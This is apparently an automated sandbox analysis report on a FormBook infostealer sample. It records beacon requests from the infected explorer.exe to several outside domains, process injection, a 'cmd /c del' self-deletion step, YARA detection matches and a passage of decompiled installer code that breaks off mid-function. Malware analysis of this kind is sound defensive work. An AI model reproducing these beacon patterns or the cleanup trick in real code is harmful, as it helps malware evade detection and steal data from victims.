                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 52 65 67 69 73 74 65 72 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 66 72 69 68 6f 73 74 2e 63 6f 6d 2f 72 65 73 6f 75 72 63 65 73 2f 64 6f 6d 61 69 6e 5f 70 61 67 65 73 2f 63 6f 6d 69 6e 67 5f 73 6f 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <title>Domain Registered</title> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" /> </head> <body> <script type="text/javascript" src="https://cdn.afrihost.com/resources/domain_pages/coming_soon.js"></script> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            5192.168.2.349723162.209.114.20180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:50.801923037 CEST5012OUTGET /uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.zagorafinancial.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:50.927325964 CEST5013INHTTP/1.1 301 Moved Permanently
                                                                            Server: Apache/2.4.38 (Debian)
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Date: Mon, 12 Apr 2021 08:06:50 GMT
                                                                            Location: http://www.zagorafinancial.com/uoe8?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: close
                                                                            Set-Cookie: X-Mapping-fjhppofk=F4200E476AB699C7006F4ED450BE5EF4; path=/
                                                                            Content-Length: 431
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 7a 61 67 6f 72 61 66 69 6e 61 6e 63 69 61 6c 2e 63 6f 6d 2f 75 6f 65 38 3f 44 6e 68 38 3d 30 41 67 6b 6d 4d 64 62 2f 78 63 41 74 6f 74 38 78 6c 6f 4f 37 6a 45 4c 36 65 32 47 57 73 6f 41 47 47 46 34 67 35 76 65 6c 73 53 34 72 49 7a 61 41 33 4f 35 2b 4f 59 57 51 4d 51 4b 67 38 48 72 37 43 39 41 26 61 6d 70 3b 70 50 42 3d 4b 32 4d 78 6c 74 6b 48 42 44 4b 34 68 44 4d 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 7a 61 67 6f 72 61 66 69 6e 61 6e 63 69 61 6c 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.zagorafinancial.com/uoe8?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&amp;pPB=K2MxltkHBDK4hDMp">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at www.zagorafinancial.com Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            6192.168.2.34972523.227.38.7480C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:56.074539900 CEST5027OUTGET /uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.funnyfootballmugs.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:56.251104116 CEST5029INHTTP/1.1 403 Forbidden
                                                                            Date: Mon, 12 Apr 2021 08:06:56 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Sorting-Hat-PodId: -1
                                                                            X-Dc: gcp-us-central1
                                                                            X-Request-ID: ee683330-34a4-49fd-a8a8-061e94606168
                                                                            Set-Cookie: _shopify_fs=2021-04-12T08%3A06%3A56Z; Expires=Tue, 12-Apr-22 08:06:56 GMT; Domain=funnyfootballmugs.com; Path=/; SameSite=Lax
                                                                            X-XSS-Protection: 1; mode=block
                                                                            X-Download-Options: noopen
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                            CF-Cache-Status: DYNAMIC
                                                                            cf-request-id: 0966b7a16d00004ed36109e000000001
                                                                            Server: cloudflare
                                                                            CF-RAY: 63eaf548a8ab4ed3-FRA
                                                                            alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                            Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d
                                                                            Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;m
                                                                            Apr 12, 2021 10:06:56.251144886 CEST5030INData Raw: 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b
                                                                            Data Ascii: argin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9
                                                                            Apr 12, 2021 10:06:56.251162052 CEST5032INData Raw: e0 b8 b5 e0 b9 89 22 0a 20 20 7d 2c 0a 20 20 22 70 74 2d 42 52 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 65 73 73 6f 20 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 56 6f 63 c3
                                                                            Data Ascii: " }, "pt-BR": { "title": "Acesso negado", "content-title": "Voc no tem permisso para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina
                                                                            Apr 12, 2021 10:06:56.251178026 CEST5033INData Raw: 64 65 6e 69 65 64 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 59 6f 75 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 77 65 62 73 69 74 65 22 0a
                                                                            Data Ascii: denied", "content-title": "You do not have permission to access this website" }, "hi": { "title": " ", "content-title": "
                                                                            Apr 12, 2021 10:06:56.251194000 CEST5033INData Raw: 67 75 61 67 65 20 7c 7c 20 2f 2f 20 49 45 20 3c 3d 20 31 30 0a 20 20 20 20 22 65 6e 22 3b 0a 20 20 6c 61 6e 67 75 61 67 65 20 3d 20 6c 61 6e 67 75 61 67 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3b 20 2f 2f 20 53 74 72 69 70 20 63 6f 75 6e 74
                                                                            Data Ascii: guage || // IE <= 10 "en"; language = language.split("-")[0]; // Strip country code translations = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=
                                                                            Apr 12, 2021 10:06:56.251204967 CEST5034INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            7192.168.2.349726185.253.212.2280C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:07:06.537733078 CEST5035OUTGET /uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.przyczepy.net
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:07:06.602643967 CEST5035INHTTP/1.1 403 Forbidden
                                                                            Server: nginx
                                                                            Date: Mon, 12 Apr 2021 08:07:06 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 146
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            8192.168.2.34973245.142.156.4480C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:07:18.188160896 CEST5085OUTGET /uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.3992199.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:07:18.403820038 CEST5085INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 12 Apr 2021 07:55:43 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 146
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            9192.168.2.349733184.168.131.24180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:07:23.705914021 CEST5086OUTGET /uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.montcoimmigrationlawyer.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:07:23.957165956 CEST5087INHTTP/1.1 301 Moved Permanently
                                                                            Server: nginx/1.16.1
                                                                            Date: Mon, 12 Apr 2021 08:07:23 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Location: https://shglawpa.com/uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Code Manipulations

                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            Analysis Process: NdBLyH2h5d.exe PID: 5612 Parent PID: 5620

                                                                            General

                                                                            Start time:10:05:27
                                                                            Start date:12/04/2021
                                                                            Path:C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\NdBLyH2h5d.exe'
                                                                            Imagebase:0x400000
                                                                            File size:207111 bytes
                                                                            MD5 hash:3FEF6985AF0D52AB6701DF170096B504
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            Chronological Activities

                                                                            Analysis Process: NdBLyH2h5d.exe PID: 6140 Parent PID: 5612

                                                                            General

                                                                            Start time:10:05:28
                                                                            Start date:12/04/2021
                                                                            Path:C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\NdBLyH2h5d.exe'
                                                                            Imagebase:0x400000
                                                                            File size:207111 bytes
                                                                            MD5 hash:3FEF6985AF0D52AB6701DF170096B504
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            Chronological Activities

                                                                            Analysis Process: explorer.exe PID: 3388 Parent PID: 6140

                                                                            General

                                                                            Start time:10:05:32
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff714890000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: rundll32.exe PID: 6048 Parent PID: 3388

                                                                            General

                                                                            Start time:10:05:43
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                            Imagebase:0x300000
                                                                            File size:61952 bytes
                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: cmd.exe PID: 4228 Parent PID: 6048

                                                                            General

                                                                            Start time:10:05:48
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
                                                                            Imagebase:0xd70000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: conhost.exe PID: 5988 Parent PID: 4228

                                                                            General

                                                                            Start time:10:05:48
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6b2800000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >

                                                                              Analysis Process: NdBLyH2h5d.exe PID: 5612 Parent PID: 5620 NdBLyH2h5d.exeCOMMON

                                                                              Executed Functions

                                                                              Function 0040314A, Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 282stringfilecomCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 86%
                                                                              			_entry_() {
				struct _SHFILEINFOA _v356;
				long _v372;
				char _v380;
				int _v396;
				CHAR* _v400;
				signed int _v404;
				signed int _v408;
				char _v416;
				intOrPtr _v424;
				intOrPtr _t31;
				void* _t36;
				CHAR* _t41;
				signed int _t43;
				CHAR* _t46;
				signed int _t48;
				int _t52;
				signed int _t56;
				void* _t78;
				CHAR* _t89;
				signed int _t90;
				void* _t91;
				CHAR* _t96;
				signed int _t97;
				signed int _t99;
				signed char* _t103;
				CHAR* _t105;
				signed int _t106;
				void* _t108;

				_t99 = 0;
				_v372 = 0;
				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x7a3030 = _t31;
				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
				E004059BF(0x7a2780, "NSIS Error");
				_t89 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t89);
				_t36 = E00403116(_t108);
				_t109 = _t36;
				if(_t36 != 0) {
					L2:
					_t96 = "\"C:\\Users\\hardz\\Desktop\\NdBLyH2h5d.exe\" ";
					DeleteFileA(_t96); // executed
					E004059BF(_t96, GetCommandLineA());
					 *0x7a2f80 = GetModuleHandleA(0);
					_t41 = _t96;
					if("\"C:\\Users\\hardz\\Desktop\\NdBLyH2h5d.exe\" " == 0x22) {
						_v404 = 0x22;
						_t41 =  &M007A9001;
					}
					_t43 = CharNextA(E004054F7(_t41, _v404));
					_v408 = _t43;
					while(1) {
						_t91 =  *_t43;
						_t112 = _t91;
						if(_t91 == 0) {
							break;
						}
						__eflags = _t91 - 0x20;
						if(_t91 != 0x20) {
							L7:
							__eflags =  *_t43 - 0x22;
							_v404 = 0x20;
							if( *_t43 == 0x22) {
								_t43 = _t43 + 1;
								__eflags = _t43;
								_v404 = 0x22;
							}
							__eflags =  *_t43 - 0x2f;
							if( *_t43 != 0x2f) {
								L17:
								_t43 = E004054F7(_t43, _v404);
								__eflags =  *_t43 - 0x22;
								if(__eflags == 0) {
									_t43 = _t43 + 1;
									__eflags = _t43;
								}
								continue;
							} else {
								_t43 = _t43 + 1;
								__eflags =  *_t43 - 0x53;
								if( *_t43 == 0x53) {
									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000002;
										__eflags = _t99;
									}
								}
								__eflags =  *_t43 - 0x4352434e;
								if( *_t43 == 0x4352434e) {
									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000004;
